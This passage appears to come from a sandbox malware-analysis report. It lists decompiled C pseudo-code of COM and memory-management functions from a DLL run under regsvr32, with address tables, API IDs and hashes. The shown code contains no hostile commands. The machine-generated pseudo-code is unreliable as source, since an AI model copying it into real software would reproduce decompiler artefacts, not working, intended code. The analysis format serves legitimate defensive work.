							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x1005fbd4, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E1003B437(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x1005fbb4);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x1005fcf4);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E100160BC(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E10032586(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E1002F9F2(__ecx, __eax);
						}
						__eax = E100160BC(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E1002E6F0(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E1003BB70(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E100325A8( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E1002F9AF(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E100160BC(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E1002E1A8(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E100182A6( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E1002E0D0( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								_v168 = 0x1006c808;
								E1003D2F0( &_v168, 0x10065188);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_v176 = 0x1006c8a0;
								E1003D2F0( &_v176, 0x100651e8);
								asm("int3");
								_push(_t229);
								_push(_t188);
								_v184 = 0x1006c938;
								E1003D2F0( &_v184, 0x1006522c);
								asm("int3");
								_push(4);
								E1003D1E6(E10052A8D, _t181, 0, _t222);
								_t214 = E1002D12C(0x104);
								_v196 = _t214;
								_t179 = 0;
								_v184 = 0;
								if(_t214 != 0) {
									_t179 = E10022AE3(_t214);
								}
								return E1003D2BE(_t179);
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}



















































                                                                                                                0x10032d33
                                                                                                                0x10032d33
                                                                                                                0x10032d34
                                                                                                                0x10032d37
                                                                                                                0x10032d3b
                                                                                                                0x10032d42
                                                                                                                0x10032d45
                                                                                                                0x10032d4c
                                                                                                                0x10032d51
                                                                                                                0x10032d56
                                                                                                                0x10032d61
                                                                                                                0x10032d64
                                                                                                                0x10032ea9
                                                                                                                0x10032eac
                                                                                                                0x10032eae
                                                                                                                0x10032ebd
                                                                                                                0x10032ec7
                                                                                                                0x10032eca
                                                                                                                0x10032ecc
                                                                                                                0x10032edd
                                                                                                                0x10032ee2
                                                                                                                0x10032ef1
                                                                                                                0x10032ef4
                                                                                                                0x10032ef7
                                                                                                                0x10032efe
                                                                                                                0x10032f01
                                                                                                                0x10032f08
                                                                                                                0x10032f0d
                                                                                                                0x10032f10
                                                                                                                0x10032f17
                                                                                                                0x10032f1d
                                                                                                                0x10032f24
                                                                                                                0x10032f27
                                                                                                                0x10032f2e
                                                                                                                0x10032f31
                                                                                                                0x10032f3e
                                                                                                                0x10032f40
                                                                                                                0x10032f42
                                                                                                                0x10032f5b
                                                                                                                0x10032f5e
                                                                                                                0x10032f61
                                                                                                                0x10032f67
                                                                                                                0x10032f6e
                                                                                                                0x10032f71
                                                                                                                0x10032f74
                                                                                                                0x10032f7a
                                                                                                                0x10032f7d
                                                                                                                0x10032f7f
                                                                                                                0x10032f82
                                                                                                                0x10032f98
                                                                                                                0x10032f9b
                                                                                                                0x10032f9e
                                                                                                                0x10032fa1
                                                                                                                0x10032fa4
                                                                                                                0x10032fa7
                                                                                                                0x10032fad
                                                                                                                0x00000000
                                                                                                                0x10032f84
                                                                                                                0x10032f84
                                                                                                                0x10032f8a
                                                                                                                0x10032f8a
                                                                                                                0x00000000
                                                                                                                0x10032f44
                                                                                                                0x10032f44
                                                                                                                0x10032f4a
                                                                                                                0x10032f4d
                                                                                                                0x10032f4d
                                                                                                                0x10032f42
                                                                                                                0x10032eb0
                                                                                                                0x10032eb0
                                                                                                                0x10032eb0
                                                                                                                0x00000000
                                                                                                                0x10032d6a
                                                                                                                0x10032d6a
                                                                                                                0x10032d6d
                                                                                                                0x10032d6f
                                                                                                                0x10032d79
                                                                                                                0x10032d7c
                                                                                                                0x10032d7e
                                                                                                                0x10032d81
                                                                                                                0x10033071
                                                                                                                0x10033074
                                                                                                                0x1003307c
                                                                                                                0x1003307d
                                                                                                                0x1003307e
                                                                                                                0x10033084
                                                                                                                0x10033089
                                                                                                                0x1003308d
                                                                                                                0x10032d87
                                                                                                                0x10032d87
                                                                                                                0x10032d8a
                                                                                                                0x10032d8c
                                                                                                                0x10032d8f
                                                                                                                0x10032d90
                                                                                                                0x10032d95
                                                                                                                0x10032d98
                                                                                                                0x10032d9a
                                                                                                                0x10032d9c
                                                                                                                0x10032d9f
                                                                                                                0x10032da2
                                                                                                                0x10032da3
                                                                                                                0x10032da8
                                                                                                                0x10032dab
                                                                                                                0x10032dad
                                                                                                                0x10032db1
                                                                                                                0x10032db3
                                                                                                                0x10032db5
                                                                                                                0x10032db8
                                                                                                                0x10032dba
                                                                                                                0x10032dbe
                                                                                                                0x10032dc1
                                                                                                                0x10032dc1
                                                                                                                0x10032dc9
                                                                                                                0x10032dcc
                                                                                                                0x10032dcf
                                                                                                                0x10032dd2
                                                                                                                0x10032dd2
                                                                                                                0x10032dd5
                                                                                                                0x10032dd8
                                                                                                                0x10032ddb
                                                                                                                0x10032ddb
                                                                                                                0x10032de0
                                                                                                                0x10032de5
                                                                                                                0x10032de8
                                                                                                                0x10032df6
                                                                                                                0x10032df6
                                                                                                                0x10032dea
                                                                                                                0x10032ded
                                                                                                                0x10032def
                                                                                                                0x10032def
                                                                                                                0x10032df8
                                                                                                                0x10032dfb
                                                                                                                0x10032dfe
                                                                                                                0x10032e01
                                                                                                                0x10032e04
                                                                                                                0x10032e07
                                                                                                                0x10032e09
                                                                                                                0x10032e0b
                                                                                                                0x10032e0d
                                                                                                                0x10032e12
                                                                                                                0x10032e12
                                                                                                                0x10032e19
                                                                                                                0x10032e1e
                                                                                                                0x10032e21
                                                                                                                0x10032e32
                                                                                                                0x10032e32
                                                                                                                0x10032e23
                                                                                                                0x10032e29
                                                                                                                0x10032e2b
                                                                                                                0x10032e2b
                                                                                                                0x10032e34
                                                                                                                0x10032e37
                                                                                                                0x10032e3a
                                                                                                                0x10032e3c
                                                                                                                0x10032e43
                                                                                                                0x10032e46
                                                                                                                0x10032e49
                                                                                                                0x10032e4c
                                                                                                                0x10032e4f
                                                                                                                0x10032e52
                                                                                                                0x10032e57
                                                                                                                0x10032e5a
                                                                                                                0x10032e66
                                                                                                                0x10032e6a
                                                                                                                0x10032e70
                                                                                                                0x10032e72
                                                                                                                0x10032e74
                                                                                                                0x10032e77
                                                                                                                0x10032e7c
                                                                                                                0x10032e86
                                                                                                                0x10032e8c
                                                                                                                0x10032e91
                                                                                                                0x10032e97
                                                                                                                0x10032e9c
                                                                                                                0x10032e9f
                                                                                                                0x10032fb0
                                                                                                                0x10032fb0
                                                                                                                0x10032fb3
                                                                                                                0x10032fb6
                                                                                                                0x10032fb8
                                                                                                                0x10032fb8
                                                                                                                0x10032fba
                                                                                                                0x10032fbc
                                                                                                                0x10032fc2
                                                                                                                0x10032fc5
                                                                                                                0x10032fc7
                                                                                                                0x10032fca
                                                                                                                0x10032fd7
                                                                                                                0x10032fd7
                                                                                                                0x10032fcc
                                                                                                                0x10032fd0
                                                                                                                0x10032fd0
                                                                                                                0x10032fd9
                                                                                                                0x10032fe0
                                                                                                                0x10032fe3
                                                                                                                0x10032fea
                                                                                                                0x10032fed
                                                                                                                0x10032fed
                                                                                                                0x10032fba
                                                                                                                0x10032ff2
                                                                                                                0x10032ff5
                                                                                                                0x10032ff7
                                                                                                                0x10032ff9
                                                                                                                0x10032ffc
                                                                                                                0x10033003
                                                                                                                0x10033004
                                                                                                                0x1003300a
                                                                                                                0x1003300d
                                                                                                                0x10033015
                                                                                                                0x10033017
                                                                                                                0x1003301a
                                                                                                                0x1003301c
                                                                                                                0x1003301f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033026
                                                                                                                0x10033033
                                                                                                                0x1003303a
                                                                                                                0x10033041
                                                                                                                0x10033044
                                                                                                                0x10033047
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033023
                                                                                                                0x10033049
                                                                                                                0x1003304b
                                                                                                                0x10033050
                                                                                                                0x10033052
                                                                                                                0x10033054
                                                                                                                0x1003305a
                                                                                                                0x1003305a
                                                                                                                0x1003305d
                                                                                                                0x10033060
                                                                                                                0x10033060
                                                                                                                0x10033060
                                                                                                                0x10033063
                                                                                                                0x00000000
                                                                                                                0x10033012
                                                                                                                0x00000000
                                                                                                                0x10033063
                                                                                                                0x10033015
                                                                                                                0x10033065
                                                                                                                0x10033068
                                                                                                                0x10033068
                                                                                                                0x1003306e
                                                                                                                0x1003306e
                                                                                                                0x00000000
                                                                                                                0x10032e7e
                                                                                                                0x1001726a
                                                                                                                0x1001726b
                                                                                                                0x1001726d
                                                                                                                0x10017277
                                                                                                                0x1001727e
                                                                                                                0x10017283
                                                                                                                0x10017284
                                                                                                                0x10017285
                                                                                                                0x10017287
                                                                                                                0x10017291
                                                                                                                0x10017298
                                                                                                                0x1001729d
                                                                                                                0x1001729e
                                                                                                                0x100172a1
                                                                                                                0x100172ab
                                                                                                                0x100172b2
                                                                                                                0x100172b7
                                                                                                                0x100172b8
                                                                                                                0x100172bf
                                                                                                                0x100172ce
                                                                                                                0x100172d0
                                                                                                                0x100172d3
                                                                                                                0x100172d7
                                                                                                                0x100172da
                                                                                                                0x100172dc
                                                                                                                0x100172dc
                                                                                                                0x100172e6
                                                                                                                0x100172e6
                                                                                                                0x10032e5c
                                                                                                                0x10032e5c
                                                                                                                0x00000000
                                                                                                                0x10032e5c
                                                                                                                0x10032e5a
                                                                                                                0x10032d81

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2459298410-0
                                                                                                                • Opcode ID: 2a1cda0c8fde6cf51b23e7454adfbcb69be02890f485d02d45f8984b0f8094f7
                                                                                                                • Instruction ID: 67e2416ab46e05a41e9fb53225900a888a4efb9c4cb038c1b3bceab70bac0ac4
                                                                                                                • Opcode Fuzzy Hash: 2a1cda0c8fde6cf51b23e7454adfbcb69be02890f485d02d45f8984b0f8094f7
                                                                                                                • Instruction Fuzzy Hash: FDC1F574600609EFCB15CF68C895AAAB7F5FF88305F10892AF856CB391DB71E945CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10033BDF Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E10033BDF(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t168;
				intOrPtr _t180;

				_push(0x10);
				E1003D1E6(E100549D9, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t168 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1005cf5c;
				 *(_t168 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t166 + 0x24)) != 0) {
						_t160 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x1c)) + 8));
						__eflags = _t160;
						if(_t160 == 0) {
							break;
						}
						_t151 =  *_t160;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t160 + 8)), 0);
						 *((intOrPtr*)( *_t160 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t168 - 0x18)) = _t166 + 0x18;
					E1002E0D0(_t166 + 0x18);
					if( *((intOrPtr*)(_t166 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t166 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t166 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t166 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t166 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t166 + 0x54));
							if( *((intOrPtr*)(_t166 + 0x54)) != 0) {
								E100325F3(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x50)))));
								E1002E719( *((intOrPtr*)(_t166 + 0x54)));
							}
							_t161 =  *((intOrPtr*)(_t166 + 0x54));
							_t192 = _t161;
							if(_t161 != 0) {
								E1002E719(_t161);
								_push(_t161);
								E100160E7(0, _t161, _t166, _t192);
							}
							_t162 =  *((intOrPtr*)(_t166 + 0x50));
							_t193 = _t162;
							if(_t162 != 0) {
								E100339BE(_t162, _t193);
								_push(_t162);
								E100160E7(0, _t162, _t166, _t193);
							}
							_t86 =  *((intOrPtr*)(_t166 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t167 =  *((intOrPtr*)(_t166 + 0x48));
							if(_t167 != 0) {
								 *((intOrPtr*)( *_t167 + 8))(_t167);
							}
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							return E1003D2BE(E1002E1CB( *((intOrPtr*)(_t168 - 0x18))));
						} else {
							 *((intOrPtr*)(_t168 - 0x10)) = 0;
							if( *((intOrPtr*)(_t166 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t166 + 0x14)));
								goto L32;
							}
							_t163 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)) + 4));
								 *((intOrPtr*)(_t168 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E100182A6(_t168 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t168 - 0x14)) != 0);
								L28:
								E1002E0D0( *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t166 + 0x14)) + _t163 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 1;
								_t163 = _t163 + 0x28;
							} while ( *((intOrPtr*)(_t168 - 0x10)) <  *((intOrPtr*)(_t166 + 0x10)));
							goto L31;
						}
					}
					_t164 = 0;
					if( *((intOrPtr*)(_t166 + 0x38)) <= 0) {
						L17:
						if(_t180 != 0) {
							_push( *((intOrPtr*)(_t166 + 0x3c)));
							E100160E7(0, _t164, _t166, _t180);
							_push( *((intOrPtr*)(_t166 + 0x40)));
							E100160E7(0, _t164, _t166, _t180);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t168 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t166 + 0x40)) +  *((intOrPtr*)(_t168 - 0x10)));
						 *((intOrPtr*)(_t168 - 0x10)) =  *((intOrPtr*)(_t168 - 0x10)) + 0x10;
						_t164 = _t164 + 1;
					} while (_t164 <  *((intOrPtr*)(_t166 + 0x38)));
					_t180 =  *((intOrPtr*)(_t166 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_push(_t168 - 0x14);
				_push(0x1005fbb4);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t168 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_push(_t168 - 0x10);
				_push(0x1005fcf4);
				 *((intOrPtr*)(_t168 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t168 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t168 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t168 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

























                                                                                                                0x10033bdf
                                                                                                                0x10033be6
                                                                                                                0x10033beb
                                                                                                                0x10033bed
                                                                                                                0x10033bf0
                                                                                                                0x10033bfb
                                                                                                                0x10033bfe
                                                                                                                0x00000000
                                                                                                                0x10033c84
                                                                                                                0x10033c63
                                                                                                                0x10033c66
                                                                                                                0x10033c68
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033c6a
                                                                                                                0x10033c6c
                                                                                                                0x10033c6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033c76
                                                                                                                0x10033c7e
                                                                                                                0x10033c7e
                                                                                                                0x10033c8c
                                                                                                                0x10033c8f
                                                                                                                0x10033c97
                                                                                                                0x10033cd1
                                                                                                                0x10033cd1
                                                                                                                0x10033cd6
                                                                                                                0x10033cdb
                                                                                                                0x10033cdb
                                                                                                                0x10033cde
                                                                                                                0x10033ce3
                                                                                                                0x10033ce8
                                                                                                                0x10033ce8
                                                                                                                0x10033cee
                                                                                                                0x10033d5d
                                                                                                                0x10033d5d
                                                                                                                0x10033d62
                                                                                                                0x10033d65
                                                                                                                0x10033d65
                                                                                                                0x10033d6b
                                                                                                                0x10033d70
                                                                                                                0x10033d77
                                                                                                                0x10033d7f
                                                                                                                0x10033d7f
                                                                                                                0x10033d84
                                                                                                                0x10033d87
                                                                                                                0x10033d89
                                                                                                                0x10033d8d
                                                                                                                0x10033d92
                                                                                                                0x10033d93
                                                                                                                0x10033d98
                                                                                                                0x10033d99
                                                                                                                0x10033d9c
                                                                                                                0x10033d9e
                                                                                                                0x10033da2
                                                                                                                0x10033da7
                                                                                                                0x10033da8
                                                                                                                0x10033dad
                                                                                                                0x10033dae
                                                                                                                0x10033db3
                                                                                                                0x10033db8
                                                                                                                0x10033db8
                                                                                                                0x10033dbb
                                                                                                                0x10033dc0
                                                                                                                0x10033dc5
                                                                                                                0x10033dc5
                                                                                                                0x10033dcb
                                                                                                                0x10033dd9
                                                                                                                0x10033cf0
                                                                                                                0x10033cf3
                                                                                                                0x10033cf6
                                                                                                                0x10033d54
                                                                                                                0x10033d57
                                                                                                                0x00000000
                                                                                                                0x10033d57
                                                                                                                0x10033cf8
                                                                                                                0x10033cfa
                                                                                                                0x10033d01
                                                                                                                0x10033d06
                                                                                                                0x10033d09
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033d0b
                                                                                                                0x10033d0b
                                                                                                                0x10033d20
                                                                                                                0x10033d20
                                                                                                                0x10033d28
                                                                                                                0x10033d2f
                                                                                                                0x10033d37
                                                                                                                0x10033d3d
                                                                                                                0x10033d43
                                                                                                                0x10033d43
                                                                                                                0x10033d46
                                                                                                                0x10033d4c
                                                                                                                0x10033d4f
                                                                                                                0x00000000
                                                                                                                0x10033cfa
                                                                                                                0x10033cee
                                                                                                                0x10033c99
                                                                                                                0x10033c9e
                                                                                                                0x10033cbd
                                                                                                                0x10033cbd
                                                                                                                0x10033cbf
                                                                                                                0x10033cc2
                                                                                                                0x10033cc7
                                                                                                                0x10033cca
                                                                                                                0x10033cd0
                                                                                                                0x00000000
                                                                                                                0x10033cbd
                                                                                                                0x10033ca0
                                                                                                                0x10033ca3
                                                                                                                0x10033caa
                                                                                                                0x10033cb0
                                                                                                                0x10033cb4
                                                                                                                0x10033cb5
                                                                                                                0x10033cba
                                                                                                                0x00000000
                                                                                                                0x10033cba
                                                                                                                0x10033c04
                                                                                                                0x10033c09
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033c0b
                                                                                                                0x10033c12
                                                                                                                0x10033c13
                                                                                                                0x10033c18
                                                                                                                0x10033c1d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033c1f
                                                                                                                0x10033c24
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10033c29
                                                                                                                0x10033c2a
                                                                                                                0x10033c2f
                                                                                                                0x10033c34
                                                                                                                0x10033c3a
                                                                                                                0x10033c3c
                                                                                                                0x10033c41
                                                                                                                0x10033c49
                                                                                                                0x10033c4c
                                                                                                                0x10033c52
                                                                                                                0x10033c52
                                                                                                                0x10033c41
                                                                                                                0x10033c55
                                                                                                                0x10033c5b
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 365290523-0
                                                                                                                • Opcode ID: a8de48418c05986b90abf77f83f785ce64b132ccee4a4e05c67e5061009a2a10
                                                                                                                • Instruction ID: e5f4853a01d02bc63f6b5fc7fbb96a165286f04c4fb03596484d01933deb3a79
                                                                                                                • Opcode Fuzzy Hash: a8de48418c05986b90abf77f83f785ce64b132ccee4a4e05c67e5061009a2a10
                                                                                                                • Instruction Fuzzy Hash: 18710175A006429FCB61CFA4D9C486AB7F2FF48306B61886DE546AB721CB31FD85CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10033809 Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 34%
                                                                                                                			E10033809(signed int __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				char _v76;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t63;
				signed int _t64;
				intOrPtr _t70;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed int _t88;
				signed int _t92;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t126;
				intOrPtr _t127;
				void* _t144;
				void* _t147;
				intOrPtr* _t148;
				signed int** _t150;
				signed int* _t151;
				signed int _t154;
				signed int _t156;
				void* _t158;
				void* _t161;

				_t144 = __edx;
				_t126 = __ecx;
				_t158 = _t161;
				_t154 = __ecx;
				_t63 =  *((intOrPtr*)(__ecx + 4));
				_push(_t147);
				if(_t63 != 0) {
					_t64 =  *(_t63 + 0x28);
					__eflags = _t64;
					if(_t64 == 0) {
